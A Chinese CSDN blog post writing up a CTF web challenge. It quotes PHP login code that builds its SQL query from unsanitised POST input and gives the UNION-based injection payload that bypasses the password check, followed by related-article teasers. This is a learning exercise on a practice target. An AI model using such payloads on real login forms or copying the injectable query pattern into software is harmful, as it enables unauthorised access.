西普实验吧ctf-web-程序逻辑问题(代码审计)

最新推荐文章于 2022-04-21 08:26:18 发布
最新推荐文章于 2022-04-21 08:26:18 发布
阅读量408 收藏
点赞数
分类专栏: # ——【 Code Audit】 ★ CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/85292267
版权

题目地址:http://ctf5.shiyanbar.com/web/5/index.php

 查看页面源代码,发现index.txt隐藏文件

 又是一道代码审计的题目:

if($_POST[user] && $_POST[pass]) {
	$conn = mysql_connect("********, "*****", "********");
	mysql_select_db("phpformysql") or die("Could not select database");
	if ($conn->connect_error) {
		die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
	printf("Error: %s\n", mysql_error($conn));
	exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  
  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
	echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");
	
  }
}

看完后,我们大概能得到两个结论:

  1. 要获取user的那一行数据。
  2. 把user那一行数据的pw列,经过md5加密后,与提交的pass数据做比较,相等就输出flag。

payload:

http://ctf5.shiyanbar.com/web/5/index.php
[POST]user=Username' union select md5(111)#&pass=111

这样就得到flag了。

烟敛寒林o
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
浅谈CTF中的逻辑漏洞
PICACHU+++的博客
10-07 1290
逻辑漏洞主要是指程序逻辑上出现的问题,例如逻辑不严密或者逻辑太复杂,从而导致一些逻辑分支不能正常处理或处理错误,通常这类漏洞多以月权访问,密码爆破等等。
实验CTF刷题记录(web篇)
sinat_21923549的博客
03-10 8681
1.这个看起来有点简单 解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1 手工检测是否存在sql注入 使用sqlmap爆出当前数据库my_db 发现可能藏有key值的thiskey表 进一步爆出字段k0y并得到key值。 2.程序员的问题 解题链接: http://ctf5.shiyanbar.com/web/4/index
最全CTF Web题思路总结(更新ing)
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
php post验证输入,PHP简单post验证绕过
weixin_39938746的博客
03-10 727
if($_POST[user] && $_POST[pass]) {$conn = mysql_connect("*******", "****", "****");mysql_select_db("****") or die("Could not select database");if ($conn->connect_error) {die("Connection fai...
CTF-Web14(涉及PHP代码审计——不走寻常路的绕过)
→_→
09-02 716
14.程序逻辑问题 分析: 查看源代码: 初了解(可略):mysql_fetch_array() 中可选的第二个参数 result_type 是一个常量,可以接受以下值:MYSQL_ASSOC,MYSQL_NUM 和 MYSQL_BOTH。本特性是 PHP 3.0.7 起新加的。本参数的默认值是 MYSQL_BOTH。如果...
ctf-web:文件包含漏洞和举例-HCTF2018 WarmUp
热门推荐
薯片薯条的博客
10-15 8万+
我又回来更新了,这次是关于web方面的文件包含漏洞.我会在后面以详细的角度来写清楚这个漏洞的利用方法. 当然,以下都是我自己的理解,表述什么的都有些野人化了.所以希望各位大佬手下留情. 一.漏洞产生的原因 这个漏洞可以追溯到很久.更准确来说,其实是人为产生的.由于我php学的不是很专业,所以我就拿c语言来举例了.php里面使用的是include命令,c语言使用的是#include预处理命令.作用是相似的. 我新建了两个文件,内容如图. wzc.h: #include "stdio.h" void pri.
西普WEB大部分题解
12-09
【标题】"西普WEB大部分题解"是一个针对网络安全领域中的Web安全训练平台——西普CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
siwikode:高级 Web 编程最终项目 - SIWIKODE 应用程序
07-24
德波市信息系统应用程序提供有关德波市领先的烹饪和休闲旅游的各种信息 由学生开发 Nurul Fikri 的集成 STT :sparkles: 2 信息技术 8 :sparkles: 环境 下载 [DBSIWIKODE MYSQL] : Setting database configuration ...
中国民航大学第四届“西普杯”信息安全竞赛-题目源程序和Writeup.zip
最新发布
10-23
中国民航大学第四届“西普杯”信息安全竞赛-题目源程序和Writeup.zip
西普软启动器STRABG-说明书-V63.doc
11-01
西普软启动器STRABG-说明书-V63doc,西普软启动器STRABG-说明书-V63
论文研究 - 依那西普治疗类风湿关节炎患者肿瘤坏死因子-α的基因表达
06-02
在患者亚组中的实验室和临床研究结果也表明,除抗环瓜氨酸肽(ACCP)抗体外,2-ΔΔCt均值的分布无明显变化。 中度阳性患者(1.566±1.104)与低阳性和高阳性患者(分别为4.061±1.366和9.668±3.518)的ACCP抗体...
Web逻辑漏洞挖掘快速入门到放弃
02-20
Web逻辑漏洞挖掘 身份认证安全、业务一致性安全、业务数据篡改、密码找回等各种漏洞案例。
从0到1CTFer成长之路-第三章-逻辑漏洞
黑白的博客
03-18 1515
声明 好好向大佬们学习!!! 攻击 逻辑漏洞 摘自 https://book.nu1l.com/tasks/#/ 使用BUUCTF在线环境 https://buuoj.cn/challenges 访问 http://3e95fcac-6f75-4037-82c4-b13e38bb3220.node3.buuoj.cn 是个炫酷的登录页面,本来还以为是通过任意用户注册,或者Session等,谁知道直接点提交,就能登进去买书 点击提交后,看到了买书的页面 映入眼帘的三本书 第一本flag,2000块
CTF实验吧-WEB专题-5
qq_18661257的专栏
12-22 6020
1.上传绕过 题解 题目说是绕过,那就绕过吧,发现,上传除了php文件外会报需要传php文件,而传php文件则会报必须上传.jpg这些图片文件,那就从上传漏洞开始吧,一般常见的上传漏洞就是截断了,是0x00数据会截断后续数据,当数据为abc.php0x001.jpg时,服务器会处理为abc.php,而0x00后的数据会忽略(产生原因magic_quotes_gpc未打开,同时相关数据没有进行处理
BUUCTF [第三章 web进阶]逻辑漏洞
m0_49025459的博客
04-21 1251
这个就很离谱,我们直接购买FLAG我们发现钱不够 但是url上显示了支付的钱和商品数,连抓包都不用,直接将这个cost修改成负的就行了
Web安全-逻辑错误漏洞
道阻且长,行则将至。
02-06 1894
概述 挖掘逻辑漏洞 绕过授权验证 密码找回漏洞 支付逻辑漏洞 指定账户恶意攻击
mysql 登录框注入_CTF| SQL注入之login界面类
weixin_34609222的博客
01-19 2510
SQL注入是CTFWEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。万能密码—very easy题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php题目来源:hacking lab inject 01~源代码有提...
实验吧-程序逻辑问题
苟有恒,必有三更眠,五更起。
08-09 221
程序逻辑问题 原题链接 分析 查看源码有个index.txt &lt;?php if($_POST[user] &amp;&amp; $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值